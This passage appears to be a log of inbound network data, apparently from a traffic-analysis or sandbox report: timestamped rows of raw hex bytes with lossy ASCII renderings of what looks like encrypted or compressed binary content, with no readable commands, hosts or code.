2022-11-29 23:31:36 UTC	79	IN	Data Raw: 47 77 a0 0e 3b e2 d0 24 2c 93 52 c0 68 06 76 95 54 19 1d ba 81 17 c3 c6 10 47 38 18 31 85 a8 80 0e 4e 03 f4 20 53 f1 6c fd 46 7a 07 af 3e be fc 78 05 59 8b 3a d9 14 3d 74 47 d6 f3 25 07 32 8a 11 0b b9 8d e3 a7 4b 5d 27 8f d7 6b f1 da 7e ec e6 82 2e 44 8d 00 14 ec 2a a8 0f ba b9 5b a5 1b 24 4a e3 e0 56 1f a0 8b aa 13 db 0c 05 7b 1c 21 67 57 6a 52 74 f0 5c 00 0f 3b 51 93 36 ba b3 57 a3 2b d5 56 aa 51 a7 8a fb 84 c0 5e c1 a2 a5 b8 46 83 0b ca 34 f0 38 24 97 24 79 a7 f6 eb c9 2f db ee 12 23 e2 7a 52 ac 66 5a a1 50 ea c3 54 3c 09 8a f2 37 b5 98 1e 3c c1 a4 bf 75 9a 18 6d 45 a9 92 0a 6d 2e 6b e9 69 88 37 a3 05 f9 a7 4a 3d eb 61 1f 3a 5f ea 86 d1 4f 65 36 d9 1a 53 f4 d5 1c 08 6a b3 c9 16 09 bd 50 a1 d3 e1 5c 0e c3 84 cb 24 bc 8a 78 8a e4 5c 46 71 2d 65 97 8a 99 Data Ascii: Gw;$,RhvTG81N SlFz>xY:=tG%2K]'k~.D*[$JV{!gWjRt\;Q6W+VQ^F48$$y/#zRfZPT<7<umEm.ki7J=a:_Oe6SjP\$x\Fq-e
2022-11-29 23:31:36 UTC	80	IN	Data Raw: 8c 12 ab 41 6a a1 6b 5f d5 2f 3f e1 8d 92 1e 31 dd 34 64 d1 42 59 7e 09 26 ea 2a ff 13 b4 11 84 83 62 6b 57 f8 a7 c1 e5 6a b3 d7 2e f0 ac 75 59 7e 8e 56 ed 45 d0 b3 72 bb 68 87 1a b9 8e 29 ea f4 a1 3e 12 92 40 db f8 ae af 8c 22 f4 79 b8 89 23 f9 b1 4d e2 c9 ac e3 8c bb c2 6b 1b 70 bf cf 3f b2 d6 58 b8 f4 a0 fc 2c 1e d9 5c da 2f 1e b5 3c e5 74 ca 99 8d bf 4e 5d d9 08 71 e4 86 b8 d5 b3 3f 44 95 4c 05 ea b6 4e 36 78 9a 55 d6 d4 3b 0f 5d c0 f7 0d 2e 4a a2 1d 08 d9 03 6a eb fd bd e4 84 e6 03 8e d1 f1 dd c5 c1 3b 5e 20 f8 cf 86 71 af 16 24 49 6c e8 00 84 2c 75 64 bc 9b b6 81 ae 00 f8 bc 45 78 f1 b6 29 59 9e b5 7d e7 cc ba 01 91 dc e4 48 50 0a c6 a7 74 28 74 ca f4 7f 57 0b 14 02 7d 88 fd ae a7 cd dc c7 70 e3 30 a1 dc a7 7c 08 63 c1 08 a4 d2 3b 94 46 1b d9 1b 5f Data Ascii: Ajk_/?14dBY~&*bkWj.uY~VErh)>@"y#Mkp?X,\/<tN]q?DLN6xU;].Jj;^ q$Il,udEx)Y}HPt(tW}p0\|c;F_
2022-11-29 23:31:36 UTC	82	IN	Data Raw: 3b 3f 07 62 bd dd 65 bb bf 55 0d c9 b9 38 66 d2 c8 83 08 e1 8a 39 d1 24 70 36 6b e2 cc ad 68 a6 2e a6 c7 87 2e 59 3d 09 91 53 ef 48 16 9b 1d fc 2f 47 3e 72 25 9d 7c d3 63 c4 52 72 97 14 20 88 53 f2 54 4d 58 16 e4 16 28 1f 70 8f d1 97 7f 4f d7 bb 85 55 52 f4 6c 45 85 2f 88 8b eb 08 51 fa 9b a4 1e 8c 44 03 c4 c9 0b c8 4c 25 Data Ascii: ;?beU8f9$p6kh..Y=SH/G>r%\|cRr STMX(pOURlE/QDL%
2022-11-29 23:31:36 UTC	82	IN	Data Raw: 49 27 3a 17 4c 99 9a ed 09 ed 19 0b 20 9c 85 e7 d9 d4 53 2c 04 3d c0 df ad de ee 58 ce 53 b2 df c7 b1 a7 75 75 c3 76 92 3a cc 42 64 a0 fd ca da f2 86 1f 79 91 88 58 05 b6 ea e4 f0 ec d2 e2 bb 4c 16 82 f1 f1 5b e2 62 75 b0 9d 71 df e0 71 ce 43 b3 49 ac 58 73 59 8d 28 ef af 12 df 63 44 21 03 b9 5d 28 2f ed 76 42 eb 92 c2 0c 1c ed 17 84 ca e2 43 81 d5 1b f7 68 91 04 9e 8d 1f 6b ad 52 d7 e1 e6 aa 9f ba 73 ee 2a a0 a1 66 a6 2e 6a 78 89 f2 9d 2a ee 15 a0 91 68 f1 2d 69 60 99 e1 19 e1 fd 34 69 7b d1 6a 59 d4 19 8d 1a 56 a0 a8 2d cd ff 03 35 b0 b4 61 46 a9 2b e2 38 80 5b 84 4c 99 f3 30 5e 8f 52 90 95 79 9d 31 e4 66 dd 02 2a 96 f0 b6 de 74 94 cb 93 a3 89 8c b4 ff 6a 75 ff f7 51 64 8d 03 4b a8 77 de dd 82 b0 3c 2e eb 4e 79 2c 67 ea 66 8a c6 3e 12 fe 95 11 2d 64 ff Data Ascii: I':L S,=XSuuv:BdyXL[buqqCIXsY(cD!](/vBChkRsf.jxh-i`4i{jYV-5aF+8[L0^Ry1f*tjuQdKw<.Ny,gf>-d
2022-11-29 23:31:36 UTC	83	IN	Data Raw: c1 4e 17 c4 5c 87 d8 32 c7 1f 3b d4 8b a4 f9 ae c6 f0 11 a0 86 fa b3 d5 6f ef 25 eb 8a 12 3a 41 dd d8 56 fb 85 2e 10 19 32 4d d2 c6 43 40 6d e2 5b 37 2e ac 63 e4 c4 75 91 3e b6 02 c0 2d f8 fd 53 ee 45 03 d6 e7 08 54 41 b9 07 bf 7a 3d 63 43 95 b8 a9 e9 0e d3 2d a8 87 2e e7 65 6e ac 12 ff 1f 25 fc 29 4a fa b3 c3 c6 10 7f c8 60 6d 7a a9 e5 0e 4d c3 63 f3 6a e4 74 1b a5 85 84 6b e9 b2 d5 79 7f 66 c9 50 89 fc 03 ea c8 d4 5c 25 47 ce 75 26 24 f1 f4 e1 a7 4b 1c db 04 27 44 90 b9 7c ec 9a 75 3a 7f 7d b2 ad 6f a2 4b 0f f7 a1 a4 92 34 0e c7 e1 e0 2a ec ac b0 ef 86 2b af 46 54 ec e6 e2 89 7f 83 61 37 a3 8b d7 a5 51 c4 bf 50 1a 07 a3 78 3d 61 c6 3f a5 23 57 3b f7 b6 ac 68 df d3 38 b8 ec 0e 41 0c d0 da f8 42 7b d3 7c 2f 90 d0 ae dd 7f 92 f5 7b 52 b4 30 b2 87 7d 91 9c Data Ascii: N\2;o%:AV.2MC@m[7.cu>-SETAz=cC-.en%)J`mzMcjtkyfP\%Gu&$K'D\|u:}oK4*+FTa7QPx=a?#W;h8AB{\|/{R0}
2022-11-29 23:31:36 UTC	84	IN	Data Raw: 60 2a 5c 23 94 a1 c0 ed f1 17 d9 85 66 6e e6 d2 86 6c a5 91 4e c3 c6 04 61 5b 25 2e 19 52 4d 84 4f 9a 3d ab b7 4f 9d b8 d8 68 a3 4f cf 61 b1 6a 70 e1 38 ed 7b 90 12 9c f3 9d a1 8e 52 42 2f 1c 38 4b 51 1e 32 fd 38 9e ea 11 ca 2b 4b 16 49 b1 3e 73 05 96 5c d5 5e f3 84 da e3 00 95 c6 c6 9c 64 91 5d b7 6b b5 05 94 d0 2e ea b0 b9 1a c0 02 2a 30 32 19 a1 79 a1 dc 12 95 1b 79 59 b1 ad b2 dc 99 0c a5 12 80 bc 04 72 7c ed dc 3e 15 19 1f 68 f4 a1 11 12 08 40 db 8c 63 02 95 a7 cc f3 4c a8 dc 06 21 77 be c1 95 2f f8 31 09 c7 c4 c2 03 46 a5 cb fe f0 af 9c 74 f1 93 9d da d5 05 d8 1f 03 6f 8b f4 bf 51 a2 3b d3 eb 99 f7 49 f8 a1 8a b7 ba 3f 68 db 4f 31 d8 37 a6 f3 9e 1a 83 43 94 68 37 6d 5c f0 b7 66 a2 03 a8 62 27 47 3f e7 c4 b1 7c da ee 4f 05 0b bc bf 1b cb f3 1b 1b 38 Data Ascii: `\#fnlNa[%.RMO=OhOajp8{RB/8KQ28+KI>s\^d]k.02yyYr\|>h@cL!w/1FtoQ;I?hO17Ch7m\fb'G?\|O8
2022-11-29 23:31:36 UTC	85	IN	Data Raw: a6 37 4f 0c 97 32 73 8a 5f cc 5d f9 2a 58 e0 69 74 8f 9c ac 3e a2 eb 13 50 b1 47 44 c2 c7 c1 90 b0 57 a1 82 eb 5b a5 dc a1 ca 76 6b dd 58 9a a4 85 9a 36 fc 8c f4 90 dc cd f0 97 ad 8b c9 73 00 0f fc ee 1f cb 45 74 5d a3 2b f0 91 5c c1 5a 75 04 c4 a5 5e b9 65 45 2c bb 7c b9 90 57 98 51 8d 77 fb f1 31 6d d7 9a 60 9d 7d c0 fe 4d c0 f1 a0 0f 39 d3 f8 1c 0c cf b7 aa 8b 80 4e c5 2b f4 ff 4e 3a 30 06 e3 18 3e 82 49 3a b3 92 b4 4f 8b 69 fd f0 41 a9 54 58 c7 18 82 61 69 b3 b3 5a 17 2e d5 a2 d4 6d 82 ac 0b 93 1c 08 04 74 38 ae 90 42 c3 bf bf e1 72 c9 22 38 5a db 2f a9 78 8a a8 ff b1 f6 b5 ee 38 bb f6 6b 3e ac 98 d6 7d 67 e9 b2 9e 15 48 12 0b 50 c5 9a f7 ea 3d 09 3a a2 3a 2d 5f 82 78 cf b4 49 4a 65 9d 23 de 9b 89 a4 83 e0 68 ce 60 30 76 84 71 0c 48 7b 43 5a 79 50 e1 Data Ascii: 7O2s_]*Xit>PGDW[vkX6sEt]+\Zu^eE,\|WQw1m`}M9N+N:0>I:OiATXaiZ.mt8Br"8Z/x8k>}gHP=::-_xIJe#h`0vqH{CZyP
2022-11-29 23:31:36 UTC	87	IN	Data Raw: 09 ed 9f e5 1a 71 e8 e0 dc a1 8d 97 8c bf 4d 07 f4 5b cc 22 33 fc 8f 76 b3 06 4e 4e c4 c9 07 66 9d 44 61 94 0a 87 97 cf 8a 37 c1 a7 2a 0b eb 0f 4c 1e 4d d9 de d0 b2 4a 6f 0e 7b ca 2c c8 5d 3b c3 99 7c b6 d4 02 ef 49 f3 3f ca d0 b6 74 4d f6 2a f1 54 16 08 0a f9 3b c8 18 0c 0f 8d 6e 3a 65 3d 9c aa cc 4b eb 66 f8 33 59 5a 43 eb 16 c6 41 33 cb 5a 5e a9 bd 0a 2f 03 ee 62 e3 50 c8 0c e8 a5 2c c6 21 75 90 42 c1 ae c7 e1 10 3b aa c1 b6 8b 1c 5c 65 c9 a7 ec 7d 17 25 b0 7e 6e 50 b9 83 68 f6 d8 34 b8 33 5f eb 3a d8 0d 7d 3f b8 0b 6a 6c 9c a6 b7 86 f4 4f 0a 93 7c ae 26 6b 05 2e 92 5e 53 03 d7 33 c7 43 68 c1 63 90 04 3f 39 0b 54 39 df d1 36 35 60 22 c9 85 8a 71 6c e2 a8 83 a9 e2 91 b4 65 60 62 d5 e7 b2 bc d6 e6 60 d8 af 3e 56 16 79 41 f7 9e ce 74 6b c0 43 ab cc bb f2 Data Ascii: qM["3vNNfDa7LMJo{,];\|I?tMT;n:e=Kf3YZCA3Z^/bP,!uB;\e}%~nPh43_:}?jlO\|&k.^S3Chc?9T965`"qle`b`>VyAtkC
2022-11-29 23:31:36 UTC	88	IN	Data Raw: 66 f7 b7 d1 3c e9 69 88 f0 26 8c 04 2b b5 44 eb 2c 1f dc da 20 7b 47 b0 ce b3 01 e7 cd 0b cf 1c 5b 6a 11 4c cf f4 0f af d0 d3 8f 5c a2 46 5d 36 a2 43 f5 78 fa e4 e9 c3 de d0 fc 68 a0 99 64 5b ad ed d7 18 08 8d bf ec 1e 3b 08 0b 50 97 ee 9b a4 49 7f 4e b0 4e 04 2c 9b 17 e4 db 40 0f 7e ef 20 ac f7 89 c5 d1 c8 04 ce 05 21 3a 84 02 35 1f 7d 2d 07 4b 7e 93 11 fe 0c ce be 62 25 e3 dc aa e3 b6 ff 97 c5 4d da fb c2 06 22 db 9c c3 65 ec 53 0b 47 47 03 b9 2b a5 19 11 a3 3f 55 c2 23 49 7f 64 29 88 f1 1d 6a 9d 1e 46 79 97 8b 1c 16 f8 78 94 bd 42 4d aa 47 54 10 39 c5 d6 c0 60 b3 2f 42 6b fe 28 ba 0d 9b 26 28 a2 33 6f f9 72 80 65 e5 59 b0 39 02 6d f8 50 60 f1 72 4d eb 4f 06 48 34 5f 0b 7b 04 27 99 67 30 4a e9 c5 1e 27 6c 33 79 85 33 4b 9f 1b 01 b1 1e ad af 6a 65 61 a2 Data Ascii: f<i&+D, {G[jL\F]6Cxhd[;PINN,@~ !:5}-K~b%M"eSGG+?U#Id)jFyxBMGT9`/Bk(&(3oreY9mP`rMOH4_{'g0J'l3y3Kjea
2022-11-29 23:31:36 UTC	89	IN	Data Raw: b4 bd 63 74 cb b1 fb ee 7d 2e 0c a8 cb cc 21 44 55 df 0c 08 3f cd e5 1f 9f b9 58 ca 56 3a 98 66 f6 42 14 4f d6 6e 03 1e 9c c7 92 a6 87 1c 56 e7 3a cf 49 09 76 42 e1 3b 32 03 9a 33 a6 1f 01 87 0f f5 58 51 69 79 26 50 b0 a3 50 15 09 6b a5 eb ef 12 1f be f4 d0 8c 8e e2 d1 65 09 62 a5 c2 dc cf bf ba 12 94 f3 4b 25 78 1c 20 83 ed ba 17 02 a1 2d db ab de ae 05 fc 65 be 2d 02 c7 50 93 41 f6 6e 6a 42 57 b8 27 a0 6b 3b 13 55 24 d1 1c ad 81 68 73 76 35 d1 10 e0 2b 7e 4f c3 9a 10 fb bd 45 cc 38 57 e8 0e 0a 03 06 a5 08 0c a2 02 6e 7a 2a af cb 3b a0 85 bb a6 8b 3a f4 14 ce f1 53 2b 35 da 0a 32 a7 11 8d 3c bb 1e 6b b4 59 27 a2 d7 94 74 91 83 21 19 84 2e 05 8d fe 91 a5 d7 60 f0 b5 b9 6a a5 99 a1 8f 1e 62 a9 74 a0 ef aa fb 5e fc f8 e5 e3 e6 e2 8f 97 df 8b a6 5c 66 0f 95 Data Ascii: ct}.!DU?XV:fBOnV:IvB;23XQiy&PPkebK%x -e-PAnjBW'k;U$hsv5+~OE8Wnz*;:S+52<kY't!.`jbt^\f
2022-11-29 23:31:36 UTC	90	IN	Data Raw: 47 51 89 c0 86 40 b0 20 46 47 28 03 c3 0e cc 6a 7d ff 53 13 a3 4f 15 10 34 4a e9 9a 71 36 f8 5c 66 0b da e4 73 61 97 0b fa d8 42 3f aa 1b 54 60 39 b7 f3 af 13 d5 73 2b 27 92 5d df 63 e8 47 06 d1 5a 0c 97 13 e9 15 e5 3c 95 65 71 21 a4 25 26 9f 1e 2c 84 3c 65 2b 5f 3e 57 0b 46 42 eb 51 5f 16 9e b5 6d 4b 09 46 0b e2 6f 22 cf 75 73 c2 71 f1 c9 11 0c 58 ce d3 6a 71 ad 94 68 3a ef 06 72 f3 23 89 4c 5a 73 df 74 99 2a e0 ac ec 81 fd c0 2a 23 ff 5f 08 1a 89 3c 03 bd e7 78 6f 67 d9 ed 4a 4f 66 ee 43 63 57 2a 65 3f 17 a1 5b 95 75 76 e8 b0 9b b2 eb 1a 40 a9 57 8f 7d f3 0f 7c ed ef e5 46 22 ab af b5 e7 f9 c3 fe e8 24 46 9b 09 cc 67 33 a0 c8 3d dc 2b 21 03 a3 ac 6b 0a f8 21 3d fb 49 e9 ff cf f8 64 ae c2 47 7f 8e 7a 6c 6e 1e 89 a6 b1 e1 3e 6f 66 34 ca 5e 9b 3f 74 aa df Data Ascii: GQ@ FG(j}SO4Jq6\fsaB?T`9s+']cGZ<eq!%&,<e+_>WFBQ_mKFo"usqXjqh:r#LZst*#_<xogJOfCcWe?[uv@W}\|F"$Fg3=+!k!=IdGzln>of4^?t
2022-11-29 23:31:36 UTC	91	IN	Data Raw: 49 25 3a 78 b7 6c c4 ed 04 06 13 52 a2 79 bc 45 1a 3c a6 c6 76 80 dc 7c b9 7a 3b ac 7a 4e 5f 33 c7 3b 7e 93 6d 5a 0d 07 dc f9 5e 90 e1 fa c7 bd 4e d9 75 fa df 37 4f 0c b8 32 32 8a 11 cc 31 f3 17 58 d5 1b 55 ee ae ac 74 a2 e7 7a 7a c5 2e 44 8d c7 f5 f1 a3 36 f0 82 b9 5b d6 a8 d3 a3 70 78 a9 28 f3 ee d8 ec 3b fa f8 84 aa e6 8c df e4 ad ff c9 3d 00 63 fc b8 1f 8f 45 25 6d d1 2b d5 91 2f c1 5a 75 04 c4 93 5e 8e 65 66 2c ef 7c a3 f1 75 f0 6a e3 57 bc d8 58 48 d7 b9 2f ab 29 fb bf 7a 85 8d ed 25 5a ce 97 02 63 d9 c3 83 c8 86 37 d0 5f e9 98 10 5b 60 6e d3 18 03 82 4f 3a d9 92 8d 4f ba 69 e9 f0 40 a9 65 58 c7 18 82 61 1f b3 da 5a 7b 2e b0 a2 96 6d 94 ac 57 93 5d 08 1a 74 3c ae 98 42 ca bf f3 e1 1f c9 29 38 5b db 33 a9 0d 8a 90 9b a6 b1 a2 9a 34 c9 c9 08 29 c8 88 Data Ascii: I%:xlRyE<v\|z;zN_3;~mZ^Nu7O221XUtzz.D6[px(;=cE%m+/Zu^ef,\|ujWXH/)z%Zc7_[`nO:Oi@eXaZ{.mW]t<B)8[34)
2022-11-29 23:31:36 UTC	93	IN	Data Raw: 6f a1 c1 da e0 d0 a9 1e 4f 9b 7f 31 5b b1 58 2e d9 a6 0a 2d 02 ea 9e 7a 3c 4b ee 7b 63 64 64 57 71 22 f5 1a c5 4c 56 dd e5 ac c1 dc 7f 71 db 12 af 38 bd 72 1d ed 82 e5 23 71 ab e0 b5 a1 b7 97 b0 bf 70 07 cb 5b ec 22 60 fc ad 76 ae 06 57 4e c6 c9 19 66 f8 44 74 94 04 87 be cf a8 37 8e a7 14 0b eb 0f 1e 1e 68 d9 c3 d0 93 4a 6f 0e 7d ca 13 c8 7e 3b fa 99 28 b6 f4 02 f1 49 96 3f f1 d0 e4 74 6a f6 2f f1 50 16 18 0a 94 3b c8 18 19 0f 8f 6e 0b 65 08 9c f8 cc 7f eb 49 f8 19 59 58 43 8e 16 fc 41 06 cb 2e 5e b7 bd 4f 2f 2e ee 65 e3 69 c8 1a e8 c4 2c fa 21 40 90 16 c1 fe c7 9d 10 27 aa d4 b6 9c 1c 58 65 cd a7 be 7d 64 25 8a 7e 5a 50 81 83 1f f6 f1 34 9e 33 6e eb 36 d8 0f 7d 2e b8 07 6a 72 9c e7 b7 f3 f4 6f 0a 82 7c bd 26 29 05 0c 92 5a 53 6e d7 56 c7 1f 68 87 63 bd Data Ascii: oO1[X.-z<K{cddWq"LVq8r#qp["`vWNfDt7hJo}~;(I?tj/P;neIYXCA.^O/.ei,!@'Xe}d%~ZP43n6}.jro\|&)ZSnVhc
2022-11-29 23:31:36 UTC	94	IN	Data Raw: 01 20 5f bb 7c f4 db 34 de 38 97 12 d0 84 28 09 d7 c9 05 db 07 97 dd 1f f6 ad 8e 66 2a a1 97 6f 63 a9 8f f6 a9 f2 44 b5 2b 9b cd 3c 28 40 0b 9a 7c 6d d2 2c 48 f7 fd d1 29 e9 00 88 9c 26 cc 04 58 b5 4b eb 0e 1f d5 da 2e 7b 59 b0 c3 b3 1f e7 c9 0b cf 1c 4a 6a 1d 4c da f4 34 af d6 d3 92 5c ac 46 64 36 99 43 df 78 d9 e4 e8 c3 d9 d0 d9 68 a5 99 61 5b ad ed ca 18 52 8d d6 ec 70 3b 44 0b 23 97 b2 9b e6 49 36 4e a2 4e 22 2c b3 17 cd db 4e 0f 67 ef 10 ac e8 89 cd d1 e0 04 f8 05 6a 3a 81 02 19 1f 66 2d 69 4b 15 93 74 fe 75 ce b1 62 1a e3 c8 aa f8 b6 ee 97 cd 4d c4 fb c2 06 0d db 86 c3 2c ec 41 0b 34 47 6b b9 5e a5 0f 11 9e 3f 78 c2 13 49 52 64 26 88 fb 1d 4c 9d 39 46 4d 97 90 1c 11 f8 57 94 8b 42 5a aa 6f 54 14 39 de d6 c1 60 b2 2f 58 6b 92 28 df 0d a4 26 67 a2 29 Data Ascii: _\|48(f*ocD+<(@\|m,H)&XK.{YJjL4\Fd6Cxha[Rp;D#I6NN",Ngj:f-iKtubM,A4Gk^?xIRd&L9FMWBZoT9`/Xk(&g)
2022-11-29 23:31:36 UTC	95	IN	Data Raw: 0a 94 1e c8 6b 50 53 c2 28 4a 0c 58 f0 d8 a9 2a b1 3a 91 7c 35 2a 2f 8e 77 b4 1d 52 b8 7a 37 e7 c9 6f 4a 7b 83 16 82 0c a6 68 89 c4 4b b2 44 14 e2 42 ef ae bf bd 7d 74 c6 b1 b6 ee 1c 2e 40 a8 d4 cc 21 44 63 df 12 08 31 cd f0 1f 9e b9 72 ca 6b 3a bb 66 d8 42 57 4f eb 6e 03 1e e8 c7 d2 a6 87 1c 24 e7 18 cf 47 09 71 42 92 3b 53 03 fd 33 b6 1f 1d 87 0a f5 67 51 52 79 7a 50 bb a3 57 15 14 6b c9 eb 8a 12 2a be dc d0 d9 8e c2 d1 00 09 10 a5 91 dc d9 bf 94 12 d8 f3 78 25 62 1c 31 83 cb ba 07 02 a5 2d d9 ab f5 ae 38 fc 44 be 3d 02 a9 50 b4 41 f1 6e 79 42 66 b8 36 a0 7d 3b 56 55 0f d1 03 ad 9f 68 62 76 52 d1 26 e0 03 7e 48 c3 b6 10 d0 bd 1d cc 09 57 df 0e 39 03 5c a5 49 0c f7 02 5a 7a 07 af f9 3b 90 85 a9 a6 d2 3a bf 14 8e f1 40 2b 6d da 40 32 ef 11 90 3c b7 1e 1b Data Ascii: kPS(JX:\|5/wRz7oJ{hKDB}t.@!Dc1rk:fBWOn$GqB;S3gQRyzPWk*x%b1-8D=PAnyBf6};VUhbvR&~HW9\IZz;:@+m@2<
2022-11-29 23:31:36 UTC	96	IN	Data Raw: 63 58 46 d6 39 8b b1 3a 7c 17 8b 4c ac 9b d9 a4 b0 94 77 9d 76 44 3a e5 02 78 57 12 42 69 38 15 e7 74 fe 75 ce e2 32 75 8c ae d8 8c c2 99 97 ac 4d b6 a8 a7 69 51 bd c0 b7 40 9b 20 6a 47 35 03 dc 0e f9 6a 5d ff 56 13 ac 4f 28 10 17 4a ce 9a 49 36 cd 5c 1a 0b c4 e4 75 61 8c 0b f1 d8 62 3f e7 1b 35 60 57 b7 b7 af 07 d5 4a 2b 19 92 28 df 0d e8 03 06 d1 5a 33 97 1d e9 3f e5 36 95 57 71 08 a4 63 26 b5 1e 11 84 02 65 31 5f 19 57 2f 46 77 eb 3b 5f 27 9e bc 6d 41 09 47 0b f5 6f 65 cf 72 73 df 71 c4 c9 6a 0c 61 ce b4 6a 46 ad 8c 68 41 ef 50 72 b6 23 f9 4c 05 73 84 74 df 2a c4 ac 86 81 9e c0 5a 23 c8 5f 58 1a c5 3c 4b bd d5 78 03 67 83 ed 14 4f 22 ee 7b 63 41 2a 24 3f 7e a1 54 95 29 76 a9 b0 e8 b2 ae 1a 18 a9 64 8f 5d f3 40 7c b1 ef 81 46 03 ab 89 b5 d7 f9 f2 fe cc Data Ascii: cXF9:\|LwvD:xWBi8tu2uMiQ@ jG5j]VO(JI6\uab?5`WJ+(Z3?6Wqc&e1_W/Fw;_'mAGoersqjajFhAPr#LstZ#_X<KxgO"{cA$?~T)vd]@\|F
2022-11-29 23:31:36 UTC	98	IN	Data Raw: 83 a9 eb 91 a2 65 7a 62 cc e7 b3 bc d1 e6 61 d8 f3 3e 0f 16 32 41 ea 9e d4 74 6b c0 2d ab fb d4 dc 2d fc 29 be 58 3e 97 50 f2 14 f6 0b 7b 0c 57 d5 32 a0 0e 3b 25 05 19 a2 1f da 82 1a 62 76 52 d1 79 c5 45 0d 3c 9f c6 43 80 db 7c b8 7a 27 ac 40 4e 66 33 d1 3b 48 93 70 5a 13 07 d9 f9 5e 90 85 fa 8c bd 14 d9 77 fa 97 37 4c 0c Data Ascii: ezba>2Atk--)X>P{W2;%bvRyE<C\|z'@Nf3;HpZ^w7L
2022-11-29 23:31:36 UTC	98	IN	Data Raw: da 32 32 8a 11 cc 19 f9 6d 58 e8 69 74 8f bf ac 11 a2 f1 13 6b b1 41 44 e9 c7 b1 90 94 57 9f 82 d4 5b d5 dc d4 ca 6a 1f cc 28 d2 8b d9 9a 02 88 8b 84 8b e6 87 df e5 ad f9 c9 33 00 6b fc f4 1f 8d 45 18 6d f3 2b 89 91 49 c1 3b 75 72 c4 af 5e b3 65 49 2c cf 7c 91 f1 47 f0 38 e3 12 bc a7 58 6d d7 a6 2f b8 29 e2 bf 72 85 c8 ed 08 5a d5 97 41 63 cf c3 97 c8 84 37 da 5f e9 98 55 5b 34 6e ff 18 20 82 4d 3a 99 92 b0 4f 8e 69 ed f0 54 a9 2e 58 b5 18 eb 61 3a b3 a9 5a 27 2e e3 a2 de 6d 86 ac 79 93 68 08 2c 74 18 ae a4 42 af bf a8 e1 76 c9 68 38 4e db 2e a9 14 8a e4 9b c3 b1 f5 9a 1b c9 c5 08 08 c8 99 a4 79 26 eb d6 8a 70 16 61 4d 50 c3 ee cb a4 15 5a 3d c3 27 58 58 d6 72 8b a8 3a 21 17 86 4c c2 9b e0 a4 d1 94 04 9d 20 44 49 e5 5e 78 4c 12 59 69 2e 15 f6 74 9a 75 92 Data Ascii: 22mXitkADW[j(3kEm+I;ur^eI,\|G8Xm/)rZAc7_U[4n M:OiT.Xa:Z'.myh,tBvh8N.y&paMPZ='XXr:!L DI^xLYi.tu
2022-11-29 23:31:36 UTC	99	IN	Data Raw: 23 71 d3 e0 d0 a1 f9 97 fe bf 29 0d 96 51 cc 22 33 fc e6 76 b9 06 59 4e c6 c9 6b 66 f8 44 13 94 49 87 d1 cf 9c 37 c2 a7 2b 0b 8e 0f 6c 1e 76 d9 c2 d0 83 4a 6f 0e 19 ca 2b c8 3f 3b ec ec 6b dd c0 74 ac 3b 86 3f 83 d0 c4 74 30 3f f2 4e 95 ee 0f 23 51 c2 92 59 11 52 08 86 e2 74 4b 5c 7a 13 fc 0b 79 c1 83 4d f0 a5 86 e7 b4 41 52 cb 1b 09 79 6f a5 af 6d 2e 6a 93 71 86 79 77 77 93 d5 af a3 71 a0 78 f8 39 b2 d4 59 a9 54 6f 52 b7 2e 65 a8 a7 ad 2a da f7 15 fe 1e 90 73 08 5d 26 a4 0e 71 0d 6d d5 75 e7 01 f0 de 7b 98 0c 5b 26 e6 3b 15 a4 1c 0a e7 7c ae 71 97 d7 88 12 2d 93 e4 42 56 65 6b fa fd d6 87 c9 13 b4 62 68 cf 36 75 b3 ea 10 1c 55 6f 35 12 6c be a8 9c 51 f7 0a 8b d8 ab a2 a5 e7 dc bc 88 9f 2a 4c 66 c7 74 33 1c 41 83 9e 04 ec ff fd 99 20 30 c0 ae 59 fc 29 46 Data Ascii: #q)Q"3vYNkfDI7+lvJo+?;kt;?t0?N#QYRtK\zyMARyom.jqywwqx9YToR.es]&qmu{[&;\|q-BVekbh6uUo5lQLft3A 0Y)F
2022-11-29 23:31:36 UTC	100	IN	Data Raw: 21 d8 10 36 99 60 25 b7 39 7e 02 68 07 a3 13 08 35 5e 18 52 ca e1 f8 90 a0 c7 90 5b 03 d1 cd 5a ac d6 6d 89 ba 86 5f 67 73 83 10 3d 66 f1 3b 22 3e cf 9f a9 02 8c 3d 97 1e 5b 39 94 18 58 2f 86 ff a1 cb 42 ae 60 d1 c9 34 0c c8 69 c7 a5 c6 ed a9 3b 52 bf bb 15 22 dd 33 93 28 d9 42 47 1e ee a3 a3 87 53 9d 00 c6 70 5a 97 6c 65 aa cf c7 60 a4 e8 4c e5 c3 c2 79 ec a7 71 a3 14 59 53 2e 78 70 31 97 24 7c 0d 85 09 13 45 02 0e f4 fa bf f4 de d1 60 26 b0 0e 32 29 ad 43 14 6f a9 92 ab ff 2a 72 41 da eb 5e ed cd ec 94 11 92 04 6b 12 79 39 cc 47 5f 61 28 48 48 ca ef bc 81 49 93 41 d7 b4 6c ad e9 6a b4 22 8d 9d d2 07 b7 e8 8e c1 ba 75 23 66 e3 25 c8 7f 6b e3 e8 92 5e 3f 8f 1a 3c 2f 6e 30 10 31 74 d4 af bc 89 d5 69 dd 5c 09 40 10 5b 83 8a a9 9a 9a c4 b0 c8 0b 0f d1 eb d2 Data Ascii: !6`%9~h5^R[Zm_gs=f;">=[9X/B`4i;R"3(BGSpZle`LyqYS.xp1$\|E`&2)Co*rA^ky9G_a(HHIAlj"u#f%k^?</n01ti\@[
2022-11-29 23:31:36 UTC	101	IN	Data Raw: aa b1 b6 ee 1c 2e 65 a8 a7 cc 7d 44 25 df 7e 08 50 cd 83 1f f6 b9 34 ca 33 3a eb 66 d8 42 7d 4f b8 6e 6a 1e 9c c7 b7 a6 f4 1c 0a e7 7c cf 26 09 05 42 92 3b 53 03 d7 33 c7 1f 68 87 63 f5 04 51 39 79 54 50 df a3 36 15 60 6b c9 eb 8a 12 6c be a8 d0 a9 8e 91 d1 65 09 62 a5 e7 dc bc bf e6 12 d8 f3 3e 25 16 1c 41 83 9e ba 74 02 c0 2d ab ab bb ae 59 fc 29 be 58 02 a9 50 f2 41 85 6e 09 42 36 b8 57 a0 0e 3b 25 55 78 d1 6c ad ed 68 06 76 52 d1 79 e0 45 7e 3c c3 c6 10 80 bd 7c cc 7a 57 ac 0e 4e 03 33 a5 3b 0c 93 02 5a 7a 07 af f9 3b 90 85 fa a6 bd 3a d9 14 fa f1 37 2b 0c da 32 32 8a 11 cc 3c f9 1e 58 b4 69 27 8f d7 ac 74 a2 83 13 19 b1 2e 44 8d c7 91 90 d7 57 f0 82 b9 5b a5 dc a1 ca 1e 1f a9 28 a0 8b aa 9a 5e 88 f8 84 e3 e6 e2 df 97 ad 8b c9 5c 00 0f fc d4 1f cb 45 Data Ascii: 